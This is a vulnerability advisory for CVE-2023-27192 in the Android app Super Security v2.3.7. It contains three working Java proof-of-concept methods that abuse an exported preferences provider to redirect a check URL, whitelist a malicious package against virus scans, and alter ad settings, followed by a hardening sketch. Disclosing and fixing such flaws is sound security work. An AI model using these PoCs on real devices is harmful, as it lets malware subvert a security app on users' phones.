Escalation of Privileges exists in Super Security (CVE-2023-27192)
Vendor: DUALSPACE (http://www.dualspace.com/pc/en/products.html)
Affected product: Super Security (com.ludashi.security)
Version: 2.3.7
Download link: https://apkpure.com/cn/super-security-virus-cleaner/com.ludashi.security
Description of the vulnerability for use in the CVE: An issue found in DUALSPACE Super Security v.2.3.7 allows an attacker to gain privileges via the SharedPreference files.
Additional information: The app is a security application that provides several security-related functions. Upon opening, the app loads the SharedPreference files into memory and uses the data in some important functions. If a malicious app modifies important data in the SharedPreference files, the Super Security app will not behave properly when loading this data. This can cause many security hazards, such as controlling the server URL the victim app is going to access (by modifying the key_wifi_safe_net_check_url field), allowing malicious apps to add themselves to the virus check whitelist (by modifying the KEY_VIRUS_SCAN_WHITELIST field), ad blocking (by modifying the key_ad_new_user_avoid_time field), and more. Even worse, users cannot fix the security issue by rebooting victim devices, since the injected data is persistent in the SharedPreference files.

1. Controlling the server URL the victim app is going to access:
PoC:
public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name", "__default__");
    contentValues.put("type", 4);
    contentValues.put("key", "key_wifi_safe_net_check_url");
    contentValues.put("value", "www.xxx.com");
    contentResolver.update(uri, contentValues, null, null);
}

2. Allowing malicious apps to add themselves to the virus scan whitelist:
PoC:
public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name", "__default__");
    contentValues.put("type", 4);
    contentValues.put("key", "KEY_VIRUS_SCAN_WHITELIST");
    contentValues.put("value", "xxx.packagename");
    contentResolver.update(uri, contentValues, null, null);
}
[Figure: KEY_VIRUS_SCAN_WHITELIST field]

3. Ad blocking:
PoC:
public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    Uri uri = Uri.parse("content://com.ludashi.security.SharedPrefProvider");
    ContentValues contentValues = new ContentValues();
    contentValues.put("file_name", "__default__");
    contentValues.put("type", 2);
    contentValues.put("key", "key_ad_new_user_avoid_time");
    contentValues.put("value", "100000");
    contentResolver.update(uri, contentValues, null, null);
}
[Figure: key_ad_new_user_avoid_time field]
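
Mitigation sketch for the provider reached by the three PoCs above, added here as an example; it is not the vendor's code. The class name HardenedPrefProvider, the host check.example.invalid and the string-only storage are assumptions; only the ContentValues field names and the key_wifi_safe_net_check_url key come from the PoCs.

```java
// Added example: hypothetical class and constants, not the vendor's code.
// Manifest side (assumption): declare the provider with android:exported="false".
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.os.Binder;
import android.os.Process;

public class HardenedPrefProvider extends ContentProvider {
    // Constructed placeholder host; a real app would pin its own endpoint.
    private static final String TRUSTED_HOST = "check.example.invalid";

    // Binder.getCallingUid() is this app's UID for in-process calls and the
    // remote app's UID for cross-app calls, so other apps are rejected here.
    private void enforceSameApp() {
        if (Binder.getCallingUid() != Process.myUid()) {
            throw new SecurityException("preference provider is private to this app");
        }
    }

    // Defence in depth: a URL-valued preference must be https on the pinned host.
    static boolean isTrustedUrl(String value) {
        Uri u = Uri.parse(value);
        return "https".equals(u.getScheme()) && TRUSTED_HOST.equals(u.getHost());
    }

    @Override public boolean onCreate() { return true; }

    @Override
    public int update(Uri uri, ContentValues values, String sel, String[] args) {
        enforceSameApp();
        if (values == null) return 0;
        String file = values.getAsString("file_name");
        String key = values.getAsString("key");
        String value = values.getAsString("value");
        if (file == null || key == null || value == null) return 0;
        if ("key_wifi_safe_net_check_url".equals(key) && !isTrustedUrl(value)) return 0;
        // Simplification: values are stored as strings; the "type" field is ignored.
        getContext().getSharedPreferences(file, Context.MODE_PRIVATE)
                .edit().putString(key, value).apply();
        return 1;
    }

    @Override public Cursor query(Uri u, String[] p, String s, String[] a, String o) { enforceSameApp(); return null; }
    @Override public Uri insert(Uri u, ContentValues v) { enforceSameApp(); return null; }
    @Override public int delete(Uri u, String s, String[] a) { enforceSameApp(); return 0; }
    @Override public String getType(Uri u) { return null; }
}
```

With the UID check in place, each update() call in the PoCs fails with a SecurityException when issued from another package, and the URL check rejects a value such as "www.xxx.com" even for in-app callers.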


